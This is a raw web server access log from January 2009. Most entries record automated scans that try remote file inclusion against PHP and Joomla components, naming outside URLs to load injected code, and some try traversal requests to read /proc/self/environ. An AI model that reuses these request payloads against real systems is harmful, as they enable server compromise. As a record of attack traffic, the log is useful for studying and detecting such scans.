200.54.154.10 - - [04/Jan/2009:08:14:24 -0800] "GET /upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:14:25 -0800] "GET /logs/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:14:37 -0800] "GET /logs//?mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 80891 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:14:38 -0800] "GET /?mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 95029 "-" "libwww-perl/5.811" "www.dmulk.com"
203.189.134.4 - - [04/Jan/2009:08:14:48 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.189.134.4 - - [04/Jan/2009:08:14:48 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:14:51 -0800] "GET /logs/access_080513.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:14:51 -0800] "GET /logs/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 80886 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:14:51 -0800] "GET /?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 94784 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:15:04 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:15:54 -0800] "GET /logs/access_071214.log/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:15:54 -0800] "GET /logs/access_080513.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:15:55 -0800] "GET /logs/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 80886 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:15:56 -0800] "GET /?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 94784 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:15:56 -0800] "GET /?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 95022 "-" "libwww-perl/5.65" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:16:03 -0800] "GET //appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:16:10 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:16:10 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:16:11 -0800] "GET /logs/access_080530.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:16:11 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.217.172.130 - - [04/Jan/2009:08:16:12 -0800] "GET /logs/access_080513.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
88.217.172.130 - - [04/Jan/2009:08:16:12 -0800] "GET /logs/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 80886 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
88.217.172.130 - - [04/Jan/2009:08:16:13 -0800] "GET /?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 94784 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:16:13 -0800] "GET /logs//UserMan/controller/common.function.php?level=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:16:13 -0800] "GET /UserMan/controller/common.function.php?level=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:16:15 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:16:16 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:16:16 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94740 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:16:16 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 80886 "-" "libwww-perl/5.811" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:16:20 -0800] "GET /logs/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 80886 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.48.189 - - [04/Jan/2009:08:16:21 -0800] "GET /logs/access_080516.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.817" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:16:27 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:36 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:37 -0800] "GET /logs/access_080806.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:37 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:37 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:39 -0800] "GET /citywriter/head.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:39 -0800] "GET /logs//citywriter/head.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /logs//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:16:40 -0800] "GET /logs//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:44 -0800] "GET /logs/access_080509.log/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:45 -0800] "GET /index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.1.215.164 - - [04/Jan/2009:08:16:46 -0800] "GET /logs/access_081028.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:16:46 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:46 -0800] "GET /logs/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:48 -0800] "GET /logs/access_080509.log/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:48 -0800] "GET /index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:16:49 -0800] "GET /logs/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.217.172.130 - - [04/Jan/2009:08:17:08 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:17:11 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:17:11 -0800] "GET /logs/access_080512.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:17:12 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
195.50.133.210 - - [04/Jan/2009:08:17:13 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:17:14 -0800] "GET /logs/access_081114.log%20/saveserver.php?thisdir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.120.7.229 - - [04/Jan/2009:08:17:15 -0800] "GET /logs/access_080421.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [04/Jan/2009:08:17:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [04/Jan/2009:08:17:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.120.7.229 - - [04/Jan/2009:08:17:15 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:17:35 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:17:56 -0800] "GET //avatar.php?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.205.39 - - [04/Jan/2009:08:17:57 -0800] "GET /logs//register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.7.205.39 - - [04/Jan/2009:08:18:01 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:18:29 -0800] "GET /logs/access_080402.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.194.5.172 - - [04/Jan/2009:08:18:30 -0800] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.194.5.172 - - [04/Jan/2009:08:18:30 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.194.5.172 - - [04/Jan/2009:08:18:31 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:18:43 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:18:43 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:18:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:18:44 -0800] "GET /db.php?path_local=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:18:44 -0800] "GET /logs/db.php?path_local=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.246.1.112 - - [04/Jan/2009:08:19:07 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:19:11 -0800] "GET /logs/access_080501.log///avatar.php?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:19:15 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 80886 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:19:17 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94756 "-" "libwww-perl/5.811" "www.dmulk.com"
62.101.68.240 - - [04/Jan/2009:08:19:18 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://amixblack.110mb.com/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:19:31 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:19:31 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:19:31 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:19:32 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:19:36 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:19:36 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.34.140.136 - - [04/Jan/2009:08:19:54 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
212.34.140.136 - - [04/Jan/2009:08:19:54 -0800] "GET /logs//register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:08:19:56 -0800] "GET //bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:19:57 -0800] "GET /logs/access_080227.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:08:20:12 -0800] "GET /retreat1/?D=A HTTP/1.1" 200 15218 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:20:15 -0800] "GET /logs/scripts.log/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:20:21 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:20:27 -0800] "GET /logs/scripts.log/index.php3?page=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:20:40 -0800] "GET /logs//?mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 80891 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:20:42 -0800] "GET /?mosConfig_absolute_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 200 95029 "-" "libwww-perl/5.811" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:20:49 -0800] "GET //book.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:21:01 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:21:01 -0800] "GET /logs/access_081027.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:21:01 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:04 -0800] "GET /logs/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:09 -0800] "GET /logs/access_080901.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:09 -0800] "GET /logs/access_080404.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:10 -0800] "GET /index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 200 94801 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:14 -0800] "GET /logs/access_080404.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:14 -0800] "GET /logs/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:14 -0800] "GET /logs/access_080901.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.160.117.157 - - [04/Jan/2009:08:21:15 -0800] "GET /index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 200 94801 "-" "libwww-perl/5.812" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:21:32 -0800] "GET /logs//poll/booth.php?include_path=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:21:32 -0800] "GET /poll/booth.php?include_path=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
